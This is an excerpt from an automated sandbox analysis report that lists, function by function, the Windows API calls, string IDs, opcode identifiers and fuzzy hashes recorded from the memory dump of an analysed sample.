            • Instruction Fuzzy Hash: C8B1D433D5A5F3058735852D05182BBEEA26E81B4131FC396DCD43F289C62AAEA692D4
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000000.00000002.565328806.0000000000571000.00000020.10000000.00040000.00000000.sdmp, Offset: 00571000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_571000_server.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
            • Instruction ID: ba825cdfcb52435d018cc06221c66a4ae281be7ad70e604ff9e008348a2a4c7f
            • Opcode Fuzzy Hash: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
            • Instruction Fuzzy Hash: ED21B2729402059BCB10EF68DCC88BBBBA5FF44350B45C568E9199B245EB30F915DBE0
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • GetTickCount.KERNEL32 ref: 00572BA8
              • Part of subcall function 00576B59: RtlEnterCriticalSection.NTDLL(0057A38C), ref: 00576B75
              • Part of subcall function 00576B59: RtlLeaveCriticalSection.NTDLL(0057A38C), ref: 00576B93
            • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00572D19
            • GetTickCount.KERNEL32 ref: 00572D2B
            • RtlEnterCriticalSection.NTDLL(0057A38C), ref: 00572D3F
            • RtlLeaveCriticalSection.NTDLL(0057A38C), ref: 00572D5D
              • Part of subcall function 00576675: lstrcat.KERNEL32(00000000,00000000), ref: 005766CA
              • Part of subcall function 00576675: StrTrimA.SHLWAPI(00000000,0057927C,00000000,00000000,00573ECE,?,0057A134,00573ECE,00000000,0057A3CC), ref: 005766E7
            • StrTrimA.SHLWAPI(00000000,00579280,?,0057A3CC), ref: 00572D8F
              • Part of subcall function 00577563: lstrcpy.KERNEL32(00000000,0057A370), ref: 0057758F
              • Part of subcall function 00577563: lstrcat.KERNEL32(00000000,?), ref: 0057759A
              • Part of subcall function 00576536: lstrlen.KERNEL32(?,00000000,0057A318,00000000,00576F0A,00000000,?,?,?,00000005,0057A00C,?,?), ref: 0057653D
              • Part of subcall function 00576536: memset.NTDLL ref: 00576578
            • wcstombs.NTDLL ref: 00572E76
              • Part of subcall function 0057597D: SysAllocString.OLEAUT32(?), ref: 005759B8
              • Part of subcall function 005761DA: RtlFreeHeap.NTDLL(00000000,00000000,005711EA,?,00000000,00000001), ref: 005761E6
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.565328806.0000000000571000.00000020.10000000.00040000.00000000.sdmp, Offset: 00571000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_571000_server.jbxd
            Similarity
            • API ID: CriticalSection$CountEnterHeapLeaveTickTrimlstrcat$AllocAllocateFreeStringlstrcpylstrlenmemsetwcstombs
            • String ID: Uhv
            • API String ID: 1650279075-4282624479
            • Opcode ID: 2079ff908d8c1c7d9b24405661de805757e55047846b034ad368ba7696e8c6e7
            • Instruction ID: 08b19f6e66f4176ecad21d751d7bd4a1aef4a5abf6ac97b530bda273e0bab961
            • Opcode Fuzzy Hash: 2079ff908d8c1c7d9b24405661de805757e55047846b034ad368ba7696e8c6e7
            • Instruction Fuzzy Hash: EFA15771500211AFD711AF65EC88E6E7BE8FB98754F054928F88CD7221DB31D889FB62
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
              • Part of subcall function 00576BF9: GetModuleHandleA.KERNEL32(?,00000020,?,74183966,00000000,?,?,?,005737FB,?,?,?,?,00000000,00000000), ref: 00576C1E
            • memset.NTDLL ref: 00573849
            • GetModuleHandleA.KERNEL32(?,00AF5BB4,?), ref: 0057387F
            • GetProcAddress.KERNEL32(00000000), ref: 00573886
            • HeapFree.KERNEL32(00000000,00000000), ref: 005738EE
              • Part of subcall function 00575B56: GetProcAddress.KERNEL32(?,00572425), ref: 00575B71
            • GetLastError.KERNEL32(00000001), ref: 005738D4
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.565328806.0000000000571000.00000020.10000000.00040000.00000000.sdmp, Offset: 00571000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_571000_server.jbxd
            Similarity
            • API ID: AddressHandleModuleProc$ErrorFreeHeapLastmemset
            • String ID: Uhv$@MhvNhv
            • API String ID: 3302146251-2625028525
            • Opcode ID: 16c1cc646981879fa83b0371cf3158dcb7a8ba31371a9d846ec18e2ccd07bbdb
            • Instruction ID: c9dafde7a7e45baa17f28e13f4a634e1d13d5f83a0327f26fdf1fd999f5e25b0
            • Opcode Fuzzy Hash: 16c1cc646981879fa83b0371cf3158dcb7a8ba31371a9d846ec18e2ccd07bbdb
            • Instruction Fuzzy Hash: 953135B1900219AFDB10AFA5EC89E9E7FBCFB48314F108465F609A7121D7305E49FB61
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00575037,?), ref: 005754E0
            • GetVersion.KERNEL32 ref: 005754EF
            • GetCurrentProcessId.KERNEL32 ref: 0057550B
            • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 00575528
            • GetLastError.KERNEL32 ref: 00575547
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.565328806.0000000000571000.00000020.10000000.00040000.00000000.sdmp, Offset: 00571000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_571000_server.jbxd
            Similarity
            • API ID: Process$CreateCurrentErrorEventLastOpenVersion
            • String ID: @MhvNhv
            • API String ID: 2270775618-713089056
            • Opcode ID: b141e7782fc20df0297fc40cdbde60cbc49a0661341d418872f7586b9d1fe222
            • Instruction ID: 01b0290adf16de42f1b99a58fef0b162db64be523591a100486ab4062b03a343
            • Opcode Fuzzy Hash: b141e7782fc20df0297fc40cdbde60cbc49a0661341d418872f7586b9d1fe222
            • Instruction Fuzzy Hash: 91F0AFB46507029BDB208F30BC19F193FA2B7A0741F108818E51EC61E0F6B184C8FB26
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • SysAllocString.OLEAUT32(?), ref: 005759B8
            • SysFreeString.OLEAUT32(00000000), ref: 00575A9D
              • Part of subcall function 00576CDF: SysAllocString.OLEAUT32(00579284), ref: 00576D2F
            • SafeArrayDestroy.OLEAUT32(00000000), ref: 00575AF0
            • SysFreeString.OLEAUT32(00000000), ref: 00575AFF
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.565328806.0000000000571000.00000020.10000000.00040000.00000000.sdmp, Offset: 00571000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_571000_server.jbxd
            Similarity
            • API ID: String$AllocFree$ArrayDestroySafe
            • String ID: Uhv
            • API String ID: 2618382806-4282624479
            • Opcode ID: f0441594299636212eb1277b7090e3b64d62bd5559d40aa1dc75f2e55771d1d4
            • Instruction ID: f630ee8a6da445ac014554e17bd2c260ce8f0216aa445284c88144d53c4d6b60
            • Opcode Fuzzy Hash: f0441594299636212eb1277b7090e3b64d62bd5559d40aa1dc75f2e55771d1d4
            • Instruction Fuzzy Hash: C351633550060AAFDB01DFA8E888A9EBBB5FFC8701F14C529E509DB220EB71DD45DB50
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?), ref: 00573FBC
            • SetEvent.KERNEL32(?), ref: 00573FCC
            • GetLastError.KERNEL32 ref: 00574055
              • Part of subcall function 005716B2: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,?), ref: 005716CD
              • Part of subcall function 005761DA: RtlFreeHeap.NTDLL(00000000,00000000,005711EA,?,00000000,00000001), ref: 005761E6
            • GetLastError.KERNEL32(00000000), ref: 0057408A
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.565328806.0000000000571000.00000020.10000000.00040000.00000000.sdmp, Offset: 00571000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_571000_server.jbxd
            Similarity
            • API ID: ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
            • String ID: @MhvNhv
            • API String ID: 602384898-713089056
            • Opcode ID: e5ca052e3e7b753baf868404a4be4718f1f3dde6f9f26657c5eef408e7d61ffa
            • Instruction ID: 68de89c69647349882fe3af1c49999c60515c94f80f60f267ce5cd2fe8864e03
            • Opcode Fuzzy Hash: e5ca052e3e7b753baf868404a4be4718f1f3dde6f9f26657c5eef408e7d61ffa
            • Instruction Fuzzy Hash: 7C3123B5D00709EFDB20DFE5DC8899EBBB8FB08300F108969E646A6151D771AA48FF51
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • RtlEnterCriticalSection.NTDLL(0057A38C), ref: 00576085
            • Sleep.KERNEL32(0000000A), ref: 0057608F
            • HeapFree.KERNEL32(00000000), ref: 005760BD
            • RtlLeaveCriticalSection.NTDLL(0057A38C), ref: 005760D2
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.565328806.0000000000571000.00000020.10000000.00040000.00000000.sdmp, Offset: 00571000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_571000_server.jbxd
            Similarity
            • API ID: CriticalSection$EnterFreeHeapLeaveSleep
            • String ID: Uhv
            • API String ID: 58946197-4282624479
            • Opcode ID: e3b27f284b297c9d30cedd64d558d6ec189739c03655f8c8acec52e97c9c422e
            • Instruction ID: 8122e892f00fd2e1008602690d638a3675d29d1c80b9b5d150f18c976d056a1a
            • Opcode Fuzzy Hash: e3b27f284b297c9d30cedd64d558d6ec189739c03655f8c8acec52e97c9c422e
            • Instruction Fuzzy Hash: B8F0D4742106029BE7188F54FC5DE697BF5BBA4301B149418E90EC73F0C730AC88FA26
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • GetUserNameW.ADVAPI32(00000000,?), ref: 00571354
            • GetComputerNameW.KERNEL32(00000000,?), ref: 00571370
              • Part of subcall function 005733DC: RtlAllocateHeap.NTDLL(00000000,00000000,0057119A), ref: 005733E8
            • GetUserNameW.ADVAPI32(?,?), ref: 005713AA
            • GetComputerNameW.KERNEL32(?,?), ref: 005713CD
            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,00000000,?,00000000,00000000,?,?,?,?), ref: 005713F0
            Memory Dump Source
            • Source File: 00000000.00000002.565328806.0000000000571000.00000020.10000000.00040000.00000000.sdmp, Offset: 00571000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_571000_server.jbxd
            Similarity
            • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
            • String ID:
            • API String ID: 3850880919-0
            • Opcode ID: 3414882bb72185674671008a2799db2fad5a1267602648a4c0633b8860eb1993
            • Instruction ID: 681eb91d4a0497d77c5d68be790b8c8bc139f098661babb8f22039bd0f47af5d
            • Opcode Fuzzy Hash: 3414882bb72185674671008a2799db2fad5a1267602648a4c0633b8860eb1993
            • Instruction Fuzzy Hash: 2C21EC76900508FFCB11DFE9E9898EEBBB9FF44300B5084AAE505E7241D7309B45EB64
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • StrChrA.SHLWAPI(?,0000005F,00000000,00000000,00000104), ref: 00574CC7
            • lstrcpy.KERNEL32(?,?), ref: 00574CF4
              • Part of subcall function 00576536: lstrlen.KERNEL32(?,00000000,0057A318,00000000,00576F0A,00000000,?,?,?,00000005,0057A00C,?,?), ref: 0057653D
              • Part of subcall function 00576536: memset.NTDLL ref: 00576578
              • Part of subcall function 00575B0E: lstrlenW.KERNEL32(?,?,?,00574E5D,3D005790,80000002,?,005757D1,?,?,005757D1,?,3D005790,80000002,?,?), ref: 00575B33
              • Part of subcall function 005761DA: RtlFreeHeap.NTDLL(00000000,00000000,005711EA,?,00000000,00000001), ref: 005761E6
            • lstrcpy.KERNEL32(?,00000000), ref: 00574D16
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.565328806.0000000000571000.00000020.10000000.00040000.00000000.sdmp, Offset: 00571000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_571000_server.jbxd
            Similarity
            • API ID: lstrcpylstrlen$FreeHeapmemset
            • String ID: vjW
            • API String ID: 1937832729-3307244170
            • Opcode ID: 3b47ff3f89b3d291d49a3bfc007686fdb57e89ea30d584764d9eab601308cd6c
            • Instruction ID: cc4e8a6e6a93782200dc28e55b3c422a90c14bdd557910808f03e9e1474cce78
            • Opcode Fuzzy Hash: 3b47ff3f89b3d291d49a3bfc007686fdb57e89ea30d584764d9eab601308cd6c
            • Instruction Fuzzy Hash: 1A51273110060AAFDF219FA0FC48EAE3BB9FB98354F108918F91D96161D731D955BF12
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • wsprintfA.USER32 ref: 005735F4
            • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00573619
              • Part of subcall function 00572B91: GetTickCount.KERNEL32 ref: 00572BA8
            • HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 00573693
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.565328806.0000000000571000.00000020.10000000.00040000.00000000.sdmp, Offset: 00571000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_571000_server.jbxd
            Similarity
            • API ID: Heap$AllocateCountFreeTickwsprintf
            • String ID: Uhv
            • API String ID: 833768658-4282624479
            • Opcode ID: 531731bc8ad786d444a6459eca3b31c8768fda27a037d2d664e7dc2d545a4785
            • Instruction ID: bed27f03a32cb7c88ef6e4fcc96c1818d3cc94d6104eb3d3232e00e78137f63c
            • Opcode Fuzzy Hash: 531731bc8ad786d444a6459eca3b31c8768fda27a037d2d664e7dc2d545a4785
            • Instruction Fuzzy Hash: 6E312175500109EBDB01DF55FC48ADE3BBCFB98351F108426F90997261D7309A88FBA1
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
              • Part of subcall function 005774EC: lstrlen.KERNEL32(00000005,00000000,?,00000027,00000000,0057A318,00000000,?,?,?,00000005,0057A00C,?,?), ref: 00577522
              • Part of subcall function 005774EC: lstrcpy.KERNEL32(00000000,00000000), ref: 00577546
              • Part of subcall function 005774EC: lstrcat.KERNEL32(00000000,00000000), ref: 0057754E
            • CreateEventA.KERNEL32(0057A34C,00000001,00000000,00000000,?,00000001,00000000,?,?,00000000,?,00576A95,?,?,?), ref: 00574A11
              • Part of subcall function 005761DA: RtlFreeHeap.NTDLL(00000000,00000000,005711EA,?,00000000,00000001), ref: 005761E6
            • WaitForSingleObject.KERNEL32(00000000,00004E20,?,00000000,?,00576A95,?,?,?), ref: 00574A71
            • WaitForSingleObject.KERNEL32(00000000,00004E20,?,00000001,00000000,?,?,00000000,?,00576A95,?,?,?), ref: 00574A9F
            • CloseHandle.KERNEL32(00000000,?,00000001,00000000,?,?,00000000,?,00576A95,?,?,?), ref: 00574AB7
            Memory Dump Source
            • Source File: 00000000.00000002.565328806.0000000000571000.00000020.10000000.00040000.00000000.sdmp, Offset: 00571000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_571000_server.jbxd
            Similarity
            • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
            • String ID:
            • API String ID: 73268831-0
            • Opcode ID: 3172c2af81b92ed6f5bcf265c9b86b3ac24b57eb22bab16134b33064057ac2e4
            • Instruction ID: bf0591c81006a0c4fe0765524a3de64863b773855e17c96c2335c6799b33bd59
            • Opcode Fuzzy Hash: 3172c2af81b92ed6f5bcf265c9b86b3ac24b57eb22bab16134b33064057ac2e4
            • Instruction Fuzzy Hash: 5D2143326903515BC7329B68BC48A6F7AEBFB88B10B018625FE5DD7151DB20CC40FB58
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • CreateEventA.KERNEL32(0057A34C,00000001,00000000,00000040,?,?,00579038,00000000,0057905C), ref: 00576A37
            • SetEvent.KERNEL32(00000000), ref: 00576A44
            • Sleep.KERNEL32(00000BB8), ref: 00576A4F
            • CloseHandle.KERNEL32(00000000), ref: 00576A56
              • Part of subcall function 00575704: WaitForSingleObject.KERNEL32(00000000,?,?,?,?,00000000,vjW,?,?,?,?,?,00576A76,?), ref: 005757DE
            Memory Dump Source
            • Source File: 00000000.00000002.565328806.0000000000571000.00000020.10000000.00040000.00000000.sdmp, Offset: 00571000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_571000_server.jbxd
            Similarity
            • API ID: Event$CloseCreateHandleObjectSingleSleepWait
            • String ID:
            • API String ID: 2559942907-0
            • Opcode ID: b8597e006770c14380bcd78b4cbcf0be7d2165089574057e9a9014fa6d417a9f
            • Instruction ID: 394fb9a50fcb975ccdf1f6ff4e1557d63757d7d86114abe123bc7dd6fca8cce6
            • Opcode Fuzzy Hash: b8597e006770c14380bcd78b4cbcf0be7d2165089574057e9a9014fa6d417a9f
            • Instruction Fuzzy Hash: C821717290061AEFCB10AFE5B8898AE7BA9BB44310B05C425EA1DB7101D7719D49ABA1
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.565328806.0000000000571000.00000020.10000000.00040000.00000000.sdmp, Offset: 00571000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_571000_server.jbxd
            Similarity
            • API ID: FreeSleepStringlstrlenmemcpy
            • String ID:
            • API String ID: 1198164300-0
            • Opcode ID: 70a4d0212c8ee5d4bf73cbbe225a98b1ca7762bfe8656c99810300d689e0159b
            • Instruction ID: 84f8222d7ceccb2fa295472bc6731b3a3d4d7ce5c8699be6c96f65988d9214c1
            • Opcode Fuzzy Hash: 70a4d0212c8ee5d4bf73cbbe225a98b1ca7762bfe8656c99810300d689e0159b
            • Instruction Fuzzy Hash: 0C21417590020AEFCB11DFA4E988D9EBFB5FF49314B108169E909E7210EB70DA45EF60
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00576708,00000000,?,0057A134,00573ECE,00000000,0057A3CC), ref: 00572713
            • RtlAllocateHeap.NTDLL(00000000,?), ref: 0057272B
            • memcpy.NTDLL(00000000,0057A3CC,-00000008,?,?,?,00576708,00000000,?,0057A134,00573ECE,00000000,0057A3CC), ref: 0057276F
            • memcpy.NTDLL(00000001,0057A3CC,00000001,00573ECE,00000000,0057A3CC), ref: 00572790
            Memory Dump Source
            • Source File: 00000000.00000002.565328806.0000000000571000.00000020.10000000.00040000.00000000.sdmp, Offset: 00571000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_571000_server.jbxd
            Similarity
            • API ID: memcpy$AllocateHeaplstrlen
            • String ID:
            • API String ID: 1819133394-0
            • Opcode ID: d74906c843b1ee81cfa04edf2016423daa5ee568da78d51dc2728d67498026ad
            • Instruction ID: 8d6b252896da0e0fcc13966fb6d72ed17df61f4f6f014a68f7ca783c16516aff
            • Opcode Fuzzy Hash: d74906c843b1ee81cfa04edf2016423daa5ee568da78d51dc2728d67498026ad
            • Instruction Fuzzy Hash: CF1136B2A00215AFC7108B69ED88D9E7FAEEBD0360F044176F408D7151E7718E44A3A0
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.565328806.0000000000571000.00000020.10000000.00040000.00000000.sdmp, Offset: 00571000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_571000_server.jbxd
            Similarity
            • API ID: ErrorLastmemset
            • String ID: <$@MhvNhv
            • API String ID: 3276359510-2511981033
            • Opcode ID: b167ab37372788f2e6efe69a6547f052058b4eba377fc831394428ec2afb7be5
            • Instruction ID: 76bb960d8de971f4e8b39c2c79234d04bf2485a4a0dc5c31454a400d19ef2b78
            • Opcode Fuzzy Hash: b167ab37372788f2e6efe69a6547f052058b4eba377fc831394428ec2afb7be5
            • Instruction Fuzzy Hash: EB014471D00219ABDB10DFA5E889FDE7BB8BB48740F408525F90CE7151E7709944ABA1
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • SetEvent.KERNEL32(0057A30C,00000001,0057109A), ref: 0057323B
            • SleepEx.KERNEL32(00000064,00000001), ref: 0057324A
            • CloseHandle.KERNEL32(0057A30C), ref: 0057326B
            • HeapDestroy.KERNEL32(0057A2D8), ref: 0057327B
            Memory Dump Source
            • Source File: 00000000.00000002.565328806.0000000000571000.00000020.10000000.00040000.00000000.sdmp, Offset: 00571000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_571000_server.jbxd
            Similarity
            • API ID: CloseDestroyEventHandleHeapSleep
            • String ID:
            • API String ID: 4109453060-0
            • Opcode ID: 84389b30c45bb8a34e0492e596edd112231f9ac898b570b01667b638f37e1e7e
            • Instruction ID: dac916e8b878f54caba4bd42a5001646eb21497535a23e03380f1551a1fb58c1
            • Opcode Fuzzy Hash: 84389b30c45bb8a34e0492e596edd112231f9ac898b570b01667b638f37e1e7e
            • Instruction Fuzzy Hash: D2F01C79B102119BDF105F35BD8CA8A3BD8BB24771B048510BC0CE22A2DB20D988B571
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.565263957.000000000040F000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040F000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_40f000_server.jbxd
            Similarity
            • API ID: __aulldvrm
            • String ID:
            • API String ID: 1302938615-3916222277
            • Opcode ID: a0b30cc0040cb5fec62895a1e771348c8461d5053fe2fe274f76a2f8fb58fc86
            • Instruction ID: 0b4e2962642302af5baa7ab99a723a4d0387960a43f5b709c9065034346dd514
            • Opcode Fuzzy Hash: a0b30cc0040cb5fec62895a1e771348c8461d5053fe2fe274f76a2f8fb58fc86
            • Instruction Fuzzy Hash: 09919F35900229DADB319A64CD883EAB3B4AF54314F1402FED819776D2D7B95ECACF48
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
              • Part of subcall function 005733DC: RtlAllocateHeap.NTDLL(00000000,00000000,0057119A), ref: 005733E8
            • WaitForSingleObject.KERNEL32(00000000,?,?,?,?,00000000,vjW,?,?,?,?,?,00576A76,?), ref: 005757DE
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.565328806.0000000000571000.00000020.10000000.00040000.00000000.sdmp, Offset: 00571000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_571000_server.jbxd
            Similarity
            • API ID: AllocateHeapObjectSingleWait
            • String ID: vjW$vjW
            • API String ID: 3050739573-616132217
            • Opcode ID: 5de0d62c8015cb520e16947453042adcc81592697d24fc923a6ffdb39ff19557
            • Instruction ID: cdd42199caa9c11a8d8a7a9b0cdebcc21962d8e05e1ddce726a8e974416a77ff
            • Opcode Fuzzy Hash: 5de0d62c8015cb520e16947453042adcc81592697d24fc923a6ffdb39ff19557
            • Instruction Fuzzy Hash: F1313E71C00529EBCF21AB95EC88DEEFF79FB94350F208425F559B2150E6B04E81EB90
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
              • Part of subcall function 00576536: lstrlen.KERNEL32(?,00000000,0057A318,00000000,00576F0A,00000000,?,?,?,00000005,0057A00C,?,?), ref: 0057653D
              • Part of subcall function 00576536: memset.NTDLL ref: 00576578
            • GetSystemTimeAsFileTime.KERNEL32(?,?,00000014,00000000,00000008,00000000, Uhv,00000008,00000014,?,00AF6010), ref: 0057518F
            • HeapFree.KERNEL32(00000000,00000000,?,00000014,00000000,00000008,00000000, Uhv,00000008,00000014,?,00AF6010), ref: 005751BD
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.565328806.0000000000571000.00000020.10000000.00040000.00000000.sdmp, Offset: 00571000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_571000_server.jbxd
            Similarity
            • API ID: Time$FileFreeHeapSystemlstrlenmemset
            • String ID: Uhv
            • API String ID: 424799130-4282624479
            • Opcode ID: d9bd8f409fa8ad69a6530dac0675b0c876fefb5014f95187d6af71d7a46916cb
            • Instruction ID: 1df9af9f85272bec7cded4b40b3567839ac779407b67222fb72b68167f01fd07
            • Opcode Fuzzy Hash: d9bd8f409fa8ad69a6530dac0675b0c876fefb5014f95187d6af71d7a46916cb
            • Instruction Fuzzy Hash: 1901B13221060ABBDB215F94AC48F9E3F79FF84710F408425FA489A161EAB1D954F750
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • GetModuleHandleA.KERNEL32(?), ref: 005763B6
            • GetProcAddress.KERNEL32(00000000,?), ref: 005763CF
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.565328806.0000000000571000.00000020.10000000.00040000.00000000.sdmp, Offset: 00571000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_571000_server.jbxd
            Similarity
            • API ID: AddressHandleModuleProc
            • String ID: Nhv
            • API String ID: 1646373207-1159304218
            • Opcode ID: 4a16af154209eeedde98c718679dbf606a13fd4bacfef5efe233d6d59c999d73
            • Instruction ID: 3a71b5c54e76f35821b6f7840ed22e9512d330ca071ca4c0198257d967942893
            • Opcode Fuzzy Hash: 4a16af154209eeedde98c718679dbf606a13fd4bacfef5efe233d6d59c999d73
            • Instruction Fuzzy Hash: 2FF037B1A11616AFDB14CF69FD58AAE37BCFB64305B000858E90CD7110E774EA89FB61
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • lstrlen.KERNEL32(?), ref: 00572064
              • Part of subcall function 005733DC: RtlAllocateHeap.NTDLL(00000000,00000000,0057119A), ref: 005733E8
            • memcpy.NTDLL(00000000,?,?,?,00000001,00000001), ref: 005720C2
            • lstrcpy.KERNEL32(00000000,?), ref: 005720D2
            • lstrcpy.KERNEL32(00000000,?), ref: 005720DE
            Memory Dump Source
            • Source File: 00000000.00000002.565328806.0000000000571000.00000020.10000000.00040000.00000000.sdmp, Offset: 00571000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_571000_server.jbxd
            Similarity
            • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
            • String ID:
            • API String ID: 3767559652-0
            • Opcode ID: 892361d5958b443a758938629cec22e570d1e9e68e19feaf290242f9398fca55
            • Instruction ID: cd4dc53e739b162b223cc25ca6c260f1fb1529bb62343c817663a0363c303be9
            • Opcode Fuzzy Hash: 892361d5958b443a758938629cec22e570d1e9e68e19feaf290242f9398fca55
            • Instruction Fuzzy Hash: A4219D7250425AABCB129F64AC4DAAA7FB8BF45390F14C054F90D9B202D671DA41E7B1
            Uniqueness

            Uniqueness Score: -1.00%